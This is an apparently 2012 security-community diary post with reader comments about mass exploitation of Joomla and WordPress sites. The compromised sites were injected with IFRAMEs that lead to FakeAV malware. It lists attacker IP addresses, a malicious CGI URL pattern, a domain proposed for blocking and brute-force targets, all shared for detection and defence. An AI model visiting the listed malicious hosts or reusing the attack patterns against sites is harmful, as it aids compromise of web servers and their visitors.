We've gotten some reports and discussion around many Joomla (and some WordPress) sites exploited and hosting IFRAMES pointing to bad places. We'll get to the downloaded in a second, but the interesting thing to note is that it doesn't seem to be a scanner exploiting one vulnerability but some tool that's basically firing a bunch of Joomla and Wordpress exploits at a given server and hoping something hits. We'd like PCAPs or weblogs if you're seeing something similar in your environment. Right now it seems the biggest pain is around Joomla users, particularly with extensions which greatly increase the vulnerability footprint and the one thing helping WordPress is the really nice feature of 1-button upgrades (and upgrades which don't tend to break your website). The IFRAMES seem to have rapidly changing FQDN's that it is using but the common element is /nightend.cgi?8. Two of the bad IPs that seem to be frequent offenders are 78.157.192.72 and 108.174.52.38. Ultimately it pulls FakeAV software to do it's badness. Mediation is your typical advice, make sure all your software is up-to-date and kept that way on a regular basis. If you have weblogs (particularly verbose ones), I would be interested in seeing them. The tool being used is of interest to me.
-- |
John 262 Posts ISC Handler Dec 10th 2012 |
Thread locked Subscribe |
Dec 10th 2012 8 years ago |
I have seen both IPs in my proxylogs and the common element is "nighttrend.cgi?8"
|
Jens 42 Posts |
Quote |
Dec 11th 2012 8 years ago |
Have seen heavy WordPress admin login brute force attempts from 91.224.160.141 and 87.229.114.219.
|
Jeff 3 Posts |
Quote |
Dec 11th 2012 8 years ago |
In a previous run-in (about 2 weeks ago) with Joomla based website problems:
91.224.160.24 177.1.78.7 189.23.171.106 177.43.64.140 189.19.207.249 177.43.160.197 |
CBob 23 Posts |
Quote |
Dec 11th 2012 8 years ago |
Did you know which versions of Wordpress are concerned ?
|
CBob 1 Posts |
Quote |
Dec 11th 2012 8 years ago |
We've seen several names for the CGI itself, common element was "?8".
We have an extra eye on all requests to FQDNs containing one of changeip's domain names, since these seem to be used for malware sites quite often. According to our proxy logs, it looks like the ongoing joomla/WP attack mainly utilizes the changeip domain "freewww.info". Does anybody know about other utilized domain names which are not part of the changeip pool? We are currently thinking about simply blocking all access to all changeip domain names in order to protect our clients. |
snowprincess 1 Posts |
Quote |
Dec 12th 2012 8 years ago |
I havent seen any bunch exploit attempts on Wordpress, but some specific attacks, which goes to most of my Wordpress sites.
Brute force to wp-login.php wp-comments-post.php Check this out https://github.com/wpscanteam/wpscan/ |
snowprincess 1 Posts |
Quote |
Dec 13th 2012 8 years ago |
Most customers with hacked websites I've dealt with in the last few weeks had Joomla 1.5 with JCE Editor from 2011 (JCE bug was fixed in August 2011) installed.
This isn't a new exploit as far as I can see from logs - just renewed activity on the part of the hackers and more dangerous payload since the release of Blackhole Toolkit 2. The usual advice applies - apply all updates and patches as soon as they are released. Unfortunately the upgrade from Joomla 1.5 to 2.5 or 3.0 isn't very user-friendly! |
Bruce Jackson, Austria 1 Posts |
Quote |
Dec 13th 2012 8 years ago |
I've seen something similar, i posted a blog entry back in November about it, http://www.my-audit.gr/hacking/new-joomla-infections-mustmoneyback-cgi/ First impression at that time was that it is PLESK related, but looking at the sites a bit more most of them were old Joomla installations.
|
Bruce Jackson, Austria 1 Posts |
Quote |
Dec 14th 2012 8 years ago |
Drive by attacks are very common at this moment, most often the IFRAME code written in Javascript is obfuscated. I develop a tool in python that scans the website and search for malicious code in the scripts. Since the pattern in the malicious code is always chaging, this tool allows to add new signatures to detect new patterns.
The script can be found at this URL: github.com/helderfernandes1279/webscriptscanner. |
Bruce Jackson, Austria 1 Posts |
Quote |
Dec 17th 2012 8 years ago |
Sign Up for Free or Log In to start participating in the conversation!